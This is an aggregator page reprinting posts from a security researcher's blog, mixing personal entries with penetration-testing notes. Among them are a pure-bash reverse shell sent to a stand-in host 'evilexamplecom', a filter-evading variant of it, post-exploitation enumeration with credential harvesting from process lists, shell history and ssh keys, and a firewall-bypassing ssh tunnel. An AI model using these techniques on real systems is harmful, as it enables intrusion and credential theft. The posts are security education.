http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2009-10-22 13:39:35 - dd if dev profanity : Some life-changing events going on over at the metasploit blog IMAGE http://www.secuobs.com/revue/news/152986.shtmlhttp://www.secuobs.com/revue/news/152986.shtml Secuobs.com : 2009-08-09 09:45:05 - dd if dev profanity - As promised, my slides for Blackhat Defcon 2009 have been placed in a web-accessible location Using Guided Missiles in Drive-bys Thanks everyone who showed up To those who didn't, maybe I'll see you next time IMAGE http://www.secuobs.com/revue/news/129301.shtmlhttp://www.secuobs.com/revue/news/129301.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - I bought a refurbished Thinkpad T40 in March with a 90-day manufacturer's warranty After having it for about two months, the USB ports died and the video card started flaking out everytime I pressed the machine in the wrong spot This was about the time when finals were approching fast and I could not live without my laptop, so I sucked it up and decided I would just pay to get it fixed out of warranty after the end of the semester This afternoon I found the invoice and called IBM It turns out that in IBM-land a 90-day warranty that started in March expires in October so they are going fix it for free Additionally, in the past I have told Dell customer support representatives that the machine I'm calling about does not have Windows installed Their response has pretty much universally been, Then it's your problem, not ours I told the IBM tech support guy the same thing and he said, We don't care about that Hurray for IBM IMAGE http://www.secuobs.com/revue/news/122510.shtmlhttp://www.secuobs.com/revue/news/122510.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - We've been in Idaho Falls for about three weeks now My job is interesting and I'm enjoying my work I haven't learned all the ropes yet I just figured out how to fill in time cards yesterday We're just about settled into our new house but there are still a bunch of boxes that haven't been unpacked And now I'm going on travel for two weeks That's not really a bad thing it will be fun and interesting and I will probably learn a ton on my first outing But there are a lot of things I need to do here in Idaho Falls Mostly paperwork things but important things nonetheless, like finding out where my paycheck goes and making sure it gets deposited before our first month's bills come due IMAGE http://www.secuobs.com/revue/news/122509.shtmlhttp://www.secuobs.com/revue/news/122509.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - Apparently I'm in the 93rd percentile for nerdiness based on this Highly Scientific Random Internet Test This is a dubious honor but one that I felt was worth sharing I am nerdier than 92pourcents of all people Are you nerdier Click here to find out IMAGE http://www.secuobs.com/revue/news/122508.shtmlhttp://www.secuobs.com/revue/news/122508.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - Defcon was a blast I met a bunch of cool people and got to hang out with some old friends fednaught, a Capture the Flag team, got second place despite my help My favorite talks were Hacking Malware Offence is the New Defence by Danny Quist and Valsmith and Exploit Writing Using Injectable Virtual Machines by Wes Brown and another fellow from the same organization The latter because James and I were discussing what we would need in order to be prepared for next year's CtF only moments before going into this presentation and hearing that it had already been written IMAGE http://www.secuobs.com/revue/news/122507.shtmlhttp://www.secuobs.com/revue/news/122507.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - In the last few weeks, we've rented a number of movies So I will succumb to the Internet's siren-like call to publish my opinion so that all who care to read it might find something with which they disagree In alphabetical order Blood Rayne - Vampires We gave it the MST3K treatment and got our two bucks worth The Ice Harvest - My executive summary John Cusack and Billybob Thornton steal some money People die There are breasts Might be a decent movie iff you like film noir Kiss Kiss Bang Bang - A good detective film with assorted twists I was on the edge of my seat for much of this movie and laughing the rest of the time Val Kilmer's character is called Gay Perry Great movie with a solid cast, entertaining plot and funny dialogue Highly recommended RV - This was billed as a slightly ridiculous comedy and it definitely lives up to that description But it's not retarded like, say, anything Will Ferrell has ever done Unleashed - From the cover and the back-of-the-case description, this is your standard martial arts movie Do not let that fool you in addition to his incredible physical abilities, Jet Li is quite an actor and Unleashed is a phenomenal movie IMAGE http://www.secuobs.com/revue/news/122506.shtmlhttp://www.secuobs.com/revue/news/122506.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - I've been resisting the new Lego sets for a while now because of their futuristic depictions of supposedly historical eras For example, the Knights' Kingdom II and Vikings series both have giant spring-loaded projectile weapons Well today I broke down and bought a vikings set I'm still uncertain about the ridiculous giant catapult powered by a lone viking Launching boulders at least three times as big as himself doesn't seem within the realm of possibility for an 8th-11th century warrior, even if he is a badass On the other hand, the armor, weapons, and non-specialty bricks are awesome On a completely unrelated note, Willyk set me up with a new gallery account today Check it out if you're interested Update 2006-11-05 the gallery url has changed and now works IMAGE http://www.secuobs.com/revue/news/122505.shtmlhttp://www.secuobs.com/revue/news/122505.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - Keyloggers are cool Hardware keyloggers are cooler because they are undetectable to the operating system A mark against hardware gizmos is that for them to be useful, one must install the gizmo and then retrieve it Until now Now it doesn't have to be retreived Now all one has to do is drop the gizmo and watch for traffic on the internet Or own a keyboard manufacturing company IMAGE http://www.secuobs.com/revue/news/122504.shtmlhttp://www.secuobs.com/revue/news/122504.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - I'm constantly updating my daily blog list and today I stumbled on securosiscom He's got decent advice for the less technically savvy which happens to mirror a lot of what I've been telling the uninitiated for a while now He also explained to John Gruber that the so-called challenge he proposed to Ellch and Maynor was asinine in a far more even tone than I might have Plus this great quote Give honest answers to honest questions, and when someone asks for the ROI of a firewall ask them for the ROI on their desk IMAGE http://www.secuobs.com/revue/news/122503.shtmlhttp://www.secuobs.com/revue/news/122503.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - Do you want to ssh to your NATed box at home Want to connect in to your machine at work that drops SYN packets at the perimeter Tired of having to live without tab-completion and other handy features when an exploit sends a shell back to netcat SSH to the rescue First, from the firewalled machine call it BoxA run ssh -nNT -R 2222 localhost 22 user boxbexamplecom then on BoxBexamplecom ssh user localhost -p2222 So what exactly does this do Let's take a look at the relevant sections from man ssh'' -n Redirects stdin from dev null actually, prevents reading from stdin This must be used when ssh is run in the background -N Do not execute a remote command This is useful for just forwarding ports protocol version 2 only -T Disable pseudo-tty allocation -R bind_address port host hostport Specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side This works by allocating a socket to listen to port on the remote side, and whenever a connection is made to this port, the connection is forwarded over the secure channel, and a connection is made to host port hostport from the local machine By default, the listening socket on the server will be bound to the loopback interface only This may be overriden by specifying a bind_address -nNT'' means we aren't going to give ssh any input, so don't execute a shell and don't allocate a tty -R is a little trickier it says start forwarding port 2222 of the remote machine BoxB to port 22 of the machine you're running ssh from BoxA Now when you run ssh localhost -p2222, you're connecting to the port forward that you just set up which sends your connection through an encrypted tunnel to BoxA, bypassing the firewall rules because the tunnel is already connected Caveats You're connecting to localhost from BoxB but the traffic is actually going to BoxA This will confuse ssh who thinks that localhost should have the same fingerprint each time To get around this, you'll likely have to delete the line beginning with localhost'' in your ssh known_hosts If you're using an exploit you'll have to know the account's password or steal an ssh key Don't complain to me if your sysadmin gets mad and blocks outbound ssh I love open source They've really thought of everything IMAGE http://www.secuobs.com/revue/news/122502.shtmlhttp://www.secuobs.com/revue/news/122502.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - It turns out that ssh by default doesn't like to stay connected forever If you setup a port forward as described below and don't connect to it right away one end or the other will timeout not sure which, but it doesn't really matter To circumvent this issue, I've taken to setting up the forward, connecting to the remote box, then connecting through the port forward in a screen session, and detaching screen or not, depending on my mood Now ssh won't be able to tell that there's no interaction and will stay connected indefinitely Incidentally, if you love the power of the command line and haven't heard of screen, you should install it at the earliest opportunity Thank me later IMAGE http://www.secuobs.com/revue/news/122501.shtmlhttp://www.secuobs.com/revue/news/122501.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - In my daily blog reading a week or so ago, I stumbled on Jon Hart's blog In it, he notes the facts that root can read any file whatsoever on a nix system and that ssh agent forwarding is accomplished using unix sockets The corollary to this is that root or someone with access to your account can steal your password-protected ssh keys after you decrypt them Having used key-based authentication on a regular basis myself, this got me to thinking about other possibilities for an unrestricted user As it turns out, if a user can read someone else's private key file, one can authenticate with it Long story short, I've modified Jon's code to also search out non-password-protected keyfiles and attempt to abuse them IMAGE http://www.secuobs.com/revue/news/122500.shtmlhttp://www.secuobs.com/revue/news/122500.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - My home firewall runs an ssh server Every few days, I go through my logs and find that someone has been attempting to guess account names and passwords on that server For a while, I just allowed it to continue because I found it interesting to see what usernames were being guessed After a few months of getting guess attempts every couple of seconds with almost no interruptions from dozens of ip addresses, I decided I didn't want to take the risk of somebody actually getting in and set up iptables rules to blackhole any ip address that sent more than ten SYN packets to ssh in less than two minutes A friend pointed me to denyhosts, a tool to watch your logs for failed ssh attempts and put the offending host into your etc hostsdeny for a certain period of time This is effectively the same as the iptables rules Both of these methods are very effective but not as interesting as seeing all the usernames tried So I downloaded the source for openssh-44p1 and made a few modifications My new sshd Logs all connections Logs usernames and passwords Never opens a shell no matter what If you'd like to set this up yourself, you can download the complete source, or if you already have the source for openssh-44p1, and don't want to download the whole thing just for a few modifications you can get just the diff Then run the following commands tar xzvf openssh-loggertargz cd openssh-logger configure --prefix usr honey --with-privsep-path usr honey chroot --with-pid-dir usr honey var run make The purpose of putting it in a strange directory is that we don't want to hose your real ssh server If that went well, run su make install touch usr honey chroot sshattackslog chown sshd sshd usr honey chroot sshattackslog Remember if you run a real ssh server, you'll want to change the port it listens on in your etc ssh sshd_config You can add section to your ssh config like this Host Port so your client will connect to the correct server Now everything should be set up and you should start seeing brute force attacks in usr honey chroot sshattackslog in no more than a couple of days Output will look something like this host 1000100 port 45677 user root pass root user root pass t00r user root pass r00t Happy hunting IMAGE http://www.secuobs.com/revue/news/122499.shtmlhttp://www.secuobs.com/revue/news/122499.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - Mosref MOsquito Remote Execution Framework is what Metasploit's Meterpreter really wants to be It is on paper a platform-agnostic virtual machine and Lisp interpreter with strong encryption on top of multiple communication channels In reality, I could never get it to compile nor could many other people based on the conversation in the mosref mailing list And even if I could have, I would have had to learn the Mosquito dialect of Lisp for it to be any kind of useful After Wes Brown's and Scott Dunlop's talk about it at Defcon 14, I really wanted to see Mosquito succeed Unfortunately, it never had any updates after that talk the last developer cvs transaction according to source forge was the initial commit The mailing list contained almost no discussion of development This afternoon I visited ephemeralsecuritycom only to discover that the domain is now parked by an advertiser and whois lists the owner as Domain Discreet I was disappointed to learn this but not surprised Oh, well If you want a platform-independent in-memory rootkit, you'll just have to write it yourself IMAGE http://www.secuobs.com/revue/news/122498.shtmlhttp://www.secuobs.com/revue/news/122498.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - There's been a lot of hype lately about the iPhone It looks snazzy It has Wifi, EDGE, Bluetooth, and all the other bells and whistles a high-end phone is expected to have these days But it's not the phone for me Before the iPhone were several Nokia offerings that are almost up to my standards The Treo and the Blackberry look like the same story almost what I want but not quite What I want in a phone are these features Wifi -- preferably with a chipset that allows me to run kismet Better yet would be one that allows me to run Lorcon and or livetap Large amounts of flash storage I'd prefer this to be internal but I don't care what the medium is I'll buy extra storage media without complaining too much With as cheap as USB flash devices are getting these days, it should be a gigabyte at minimum charge over usb a camera would be cool but not strictly necessary I used to think that I would prefer a phone with no camera because some places won't allow cameras I've recently come to realize that most places that don't allow cameras also don't allow phones Bluetooth for the sole purpose of connecting to a laptop and using the phone as a bridge a browser that handles javascript and flash decently I know this isn't as big a problem as it used to be, but the five-lines-of-text-at-a-time that my old Samsung presented as Internet just doesn't cut it a big enough screen to display many lines of text Unix-like operating system This is necessary to be able to have a useful shell a good way to input text This is necessary to be able to interact with that shell Bash or the equivalent I can do everything on the commandline faster and more efficiently an ssh client What's the point of being connected 24 7 if i can't be connected to the machines that do my bidding This also gets me to irc and other various programs that have become tethered to my brain over the last several years nmap -- this also means I need raw packets a ruby interpreter other third party applications some of which will undoubtedly be written by me And I want it all without having to go through the pain and discomfort of JailBreak and other forms of warranty-voiding DMCA-violating kludges Basically, I want my Thinkpad in a 45 x 25 x 05 inch, 5 ounce package that can make calls The FIC Neo1973 looks very promising on the software front The entire phone is open it's based on Linux and everything from the circuit boards to the kernel to the frontend is user modifiable That has strong appeal Unfortunately, it has no Wifi which makes it nearly useless to me The second generation, which does have wifi, is advertised as being available early 2008 but since it was advertised as being available on October 1 earlier this year, I'm not holding my breath The iPhone has nice hardware and a nice interface But for it to be useful requires breaking laws I boycott products that have that property in the hopes that manufacturers will start making things open enough to be useful for more than their own highly-defined and highly-limited idea of useful The Nokia N800 looks like everything I want -- Linux-based wifi third party development is encouraged hell, Immunity built a pentesting tool out of them -- but it's not a phone Maybe I'll just get one of these and keep my crappy free-with-service-agreement 6103 I would be much more interested in the Nokia E90 if it ran Linux I just can't justify a thousand dollars for a phone without being sure beforehand that I'll like it IMAGE http://www.secuobs.com/revue/news/122497.shtmlhttp://www.secuobs.com/revue/news/122497.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - http wwwkbcertorg vuls id 180876 Base64 encoding is just that encoding It's a way to ensure that text with strange characters can be sent on the wire in an unambiguous, portable manner It is not, and was never meant to be, encryption There is no added security by encoding a password with base64 Just like there is no added security by encoding a password with rot13 It is no more than obfuscation perhaps less than obfuscation since base64 on the wire sticks out and says, Hey, look at me Taking an authentication mechanism that is secured by real encryption and sending it back out in plaintext or, equivalently, encoded with base64 is ridiculous So don't ever do that IMAGE http://www.secuobs.com/revue/news/122496.shtmlhttp://www.secuobs.com/revue/news/122496.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - Bash can read and write pipes on a specific file descriptor, like so echo foo 2'' which prints to file descriptor 2 and cat footxt dev tcp examplecom 9999'' will perform a DNS lookup for examplecom, attempt to connect to TCP port 9999 of the resulting IP address, and send the string foo to the socket Putting these things together targetbox bin bash 3 dev tcp evilexamplecom 9999 3 and we've got a shell shoveler in pure bash, no outside executables Catch it with evil nc -l -p 9999 Same thing pure bash, now with no spaces for getting around input filters eval IFS bash IFS 0 1 3 dev tcp evilexamplecom 9999 IFS 0 1 3 IFS 0 1 IMAGE http://www.secuobs.com/revue/news/122495.shtmlhttp://www.secuobs.com/revue/news/122495.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - Mingw, or Minimal GNU for Windows, is a really cool project The idea is to have a gcc that will run anywhere gcc will run and can make Windows executables It does this well, giving programmers the ability to link native Windows libraries in a non-windows environment It differs from the standard gcc in a significant way that I discovered this evening order of arguments is quite important Whereas standard gcc will accept gcc code_that_uses_math_dot_hc -lm and gcc -lm code_that_uses_math_dot_hc as meaning exactly the same thing, mingw32-gcc is not so forgiving egypt bastet cat mintestc if defined _WIN32 include else typedef int SOCKET include endif include include define PORT 1234 int main struct sockaddr_in saddr SOCKET s SOCKET client if defined _WIN32 WSADATA w WSAStartup 0x101, endif printf Hello world n if defined _WIN32 WSACleanup endif return 0 egypt bastet mingw32-gcc -lws2_32 mintestc -o mintestexe tmp cc7dCAKgo mintestc text 0x29 undefined reference to WSAStartup 8' tmp cc7dCAKgo mintestc text 0x41 undefined reference to WSACleanup 0' collect2 ld returned 1 exit status egypt bastet 1 ls -l mintestexe ls cannot access mintestexe No such file or directory egypt bastet mingw32-gcc mintestc -lws2_32 -o mintestexe egypt bastet ls -l mintestexe -rwxr-xr-x 1 egypt egypt 13K Mar 11 21 50 mintestexe egypt bastet file mintestexe mintestexe MS-DOS executable PE for MS Windows console Intel 80386 32-bit egypt bastet The moral of the story is this if you're having trouble getting mingw to properly link a library, put the c as your first argument me grumbles IMAGE http://www.secuobs.com/revue/news/122494.shtmlhttp://www.secuobs.com/revue/news/122494.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - In response to Halvar Flake's request I'm not sure about 100, but there are a few that I use on any new system, mostly just basics that are useful on any multi-user environment ifconfig -a, netstat -pan --inet, uname -a, w, id, mount, ps auxww These tell you a lot about the system and where you might go from there for further exploitation ifconfig, like ipconfig on Windows, can tell you if the system has a NIC on another network and netstat can tell you if it's talking to one It's important to note that options to netstat vary from one OS to another -- the above options will list all AF_INET sockets along with associated process IDs on Linux without doing DNS lookups On Solaris and AIX it is not possible to see PIDs and the command to list all AF_INET sockets without doing DNS lookups is netstat -an -finet uname tells you the OS name and kernel version w or its cousin who will let you know if someone might be watching id is whoami on steroids it gives uid, gid, and a list of groups you belong to mount tells you how the system's storage is layed out and whether there are any removable drives attached at the moment ps lists processes and the argument tells it to list all of them, including arguments, with the owner's username If you're lucky, sometimes you see things like this root 21810 00 04 6984 2452 pts 10 S 21 13 0 00 mysql -uroot -ppassword Then we come to interesting files Obviously etc passwd and etc shadow are of interest But so are slightly more obscure things like home ssh id_rsa private keys and tmp ssh- ssh-agent auth sockets I mentioned some abuses of these files about a year and a half ago I suggest a viewing of HD Moore and Valsmith's Blackhat 2007 talk, Tactical Exploitation for some more fun things to do with ssh and kerberos Finding interesting files can sometimes be a problem, so we have find to help us out For instance, if you want to list all of the binaries you have permission to read with the setuid bit set find -perm 0400 2 dev null All files with password or passwd in their name find -iname ' passwd ' -or -iname ' password ' If you worry about leaving commands in a history file, you'll probably want to unset HISTFILE On the other hand, sometimes the history helps an attacker, too In bash the command history lists all of the commands in the history file So history grep -A1 ' ssh' and history grep -A1 ' su' can often yield passwords when the user whose account you've compromised doesn't pay attention to make sure the password prompt actually came up before typing A few more commands that are really cool but are less likely to be installed include lsof and screen IMAGE http://www.secuobs.com/revue/news/122493.shtmlhttp://www.secuobs.com/revue/news/122493.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - While attending SecTor, I finally met HD Moore in person after having been a core developer for Metasploit for almost eight months I had been introduced to him at Defcon a couple of years ago but we didn't actually talk so it doesn't count Over beers, he asked me to co-present Metasploit Prime, a discussion of new features available in the upcoming Metasploit 32-release The release itself will be announced in the next few days Slides pdf and video wmv for that presentation are now available The video is actually just audio over the slides, which is somewhat disappointing This is a gripe I've had with Blackhat for many years and Sector made the same mistake Regardless of that little issue, Sector was a blast I learned some stuff and had a great time in Toronto hanging out with HD, Jay Beale, Mark Fabro, and a bunch of other incredibly smart guys SecTor is much smaller than Defcon which is the only other security conference I've been to and I really liked the tighter knit crowd -- it makes it much easier to meet people It was considerably less technical but I enjoyed it nonetheless At Defcon, I mostly just hung out with people I already knew because the crowds were so daunting while at Sector, it was easy to meet the rockstar presenters as well as lesser-known attending geniuses Because of my experience at Sector, I will certainly look at smaller conferences in a new light IMAGE http://www.secuobs.com/revue/news/122492.shtmlhttp://www.secuobs.com/revue/news/122492.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - When I started writing ruby I missed the convenience of a tags file for jumping around in vim to different parts of a project After a bit of digging I found rtags to replace my beloved exuberant-ctags Today I updated my metasploit trunk and, since it had been awhile since I had updated tags, I also ran rtags Normally rtags is slow Running it in the metasploit source tree typically takes several minutes Today it seemed to hit infinite loops in multiple files, taking more than ten minutes on a single file before I killed it, added that file to the exclude list, ran it again and walked away for a while After running into this a dozen times or so over the course of the day, I decided to switch tactics As it turns out, exuberant-ctags has support for ruby, and probably has had it since before I started using rtags root framework3 time ctags --exclude 'svn' --exclude documentation --exclude external --exclude data --recurse real 0m0742s user 0m0616s sys 0m0092s sigh IMAGE http://www.secuobs.com/revue/news/122491.shtmlhttp://www.secuobs.com/revue/news/122491.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - As far as I can tell, it is impossible to determine whether an ActiveX object created by classid actually works without just calling specific methods of that control and catching any exceptions It doesn't seem to matter whether it was created with an tag, or through javascript's documentcreateElement object or documentwrite Internet Explorer turns anything with an id attribute into a property of document, and yet if you have documentfoo advertises no property or method that is not available from an object with no classid For those of you playing at home, yes this classid is one of the vulnerable ActiveX controls used in the MDAC ie_createobject exploits If the object actually got instantiated correctly and we can talk to it, typeof documentfooCreateObject returns unknown rather than the undefined returned for properties that don't exist So if we know a specific method that the ActiveX implements, we can check to make sure it worked using that It is unfortunate, then, that there does not seem to be a standard method or property that all ActiveX objects must implement Unless I'm missing something, because of the lack of a universal method or property, we cannot generically determine whether an ActiveX control created in this way was successfully instantiated Thus, my solution for now is to save a method to test along with the classid If this doesn't work, I just might give up on browser_autopwn's fingerprinting altogether and simply throw every single exploit at the client And also maybe shoot myself I really hate IE IMAGE http://www.secuobs.com/revue/news/122490.shtmlhttp://www.secuobs.com/revue/news/122490.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - The Ubuntu package ruby18 does not install an executable called ruby It is expected that users install the package ruby which depends on ruby18 and installs a single file a symlink called usr bin ruby that points to usr bin ruby18 IMAGE http://www.secuobs.com/revue/news/122489.shtmlhttp://www.secuobs.com/revue/news/122489.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - I've been fighting with keyboard issues in VMWare since I started using Ubuntu I'm not sure if the problems are specific to Ubuntu or if they were just introduced around the time I moved away from Gentoo, but either way, it's really annoying First, VMWare would occasionally not recognize keys correctly in guests The down arrow would become the windows key, shift would become ctrl, and alt, home, end, pgup, pgdn and the rest of the arrow keys would appear to quit functioning altogether Outside of the guest, everything was fine The fix for that was to tell VMWare to use the keymap provided by X instead of trying to figure it out Open up vmware config with your favorite editor creating it if it doesn't exist and add the following line xkeymapnoKeycodeMap TRUE Thanks to http nthrbldyblgblogspotcom 2008 06 vmware-and-fubar-keyboard-effecthtml for this one Next, VMWare would occasionally cause all of the same keys from the previous bug either to stop working or to act as though they are permanently pressed in the host After playing with this bug for awhile I found that it happens most reliably when coming out of full-screen mode There's no real solution for this one, but running setxkbmap from a terminal fixes it The vmware forums have a thread about this issue Since I sometimes can't type when this bug strikes eg when ctrl is stuck , I added a launcher to my gnome panel so that a single mouse click can give me my keyboard back Lastly, when using ctrl-g to have vmware grab input, it never releases the g key I haven't found a fix for this except to avoid using ctrl-g and the only way I've found to get a working desktop back is to ssh in from another machine and killall vmware IMAGE http://www.secuobs.com/revue/news/122488.shtmlhttp://www.secuobs.com/revue/news/122488.shtml Secuobs.com : 2009-07-20 02:53:36 - dd if dev profanity - I'm making this post in the vain hope that someone cares about what security conference topics I find interesting With that being said, Blackhat is going to be awesome this year, not least because of the Metasploit track Without further ado, here are the talks I plan to attend Day One I'm presenting at 13 45 and, judging by my history, I probably won't be done with my slides until about 13 43, so I'm planning to miss all of the morning stuff 15 15 Stefan Esser State of the Art Post Exploitation in Hardened PHP Environments This is a tough choice and I may end up flipping on it later Valsmith and Colin's stuff is freaking awesome but I think Esser's work could end up being really useful for PHP meterpreter 16 45 Valsmith, Ames, Kerb Metaphish pt2 I hope I can get into the room after the break Day Two 10 00 Datagram Lockpicking Forensics Lockpicking is a terrifically fun hobby and I'd like to learn more about it 11 15 Nick Harbour Win at Reversing I usually lose 13 45 Danny Quist Lorie Liebrock Reverse Engineering by Crayon Dr Liebrock was a professor of mine and Danny is one of the best Reverse Engineers I've ever met Can't miss this one 15 15 Kostya Kortchinsky Cloudburst - Hacking 3D and Breaking out of VMware I'm not especially interested in VMware but Kostya Kortchinsky is an exploit machine If I die half as good as Kostya is today, I'll be happy 16 45 Vincenzo Iozzo Charlie Miller Post Exploitation Bliss - Loading Meterpreter on a Factory iPhone Meterpreter is awesome and having the same post-exploitation toolkit available on multiple platforms is something I've wanted for a long time The fact that these guys ported it to a tiny embedded device that frequently gets connected to tons of open wifi networks is an extra bonus IMAGE http://www.secuobs.com/revue/news/122487.shtmlhttp://www.secuobs.com/revue/news/122487.shtml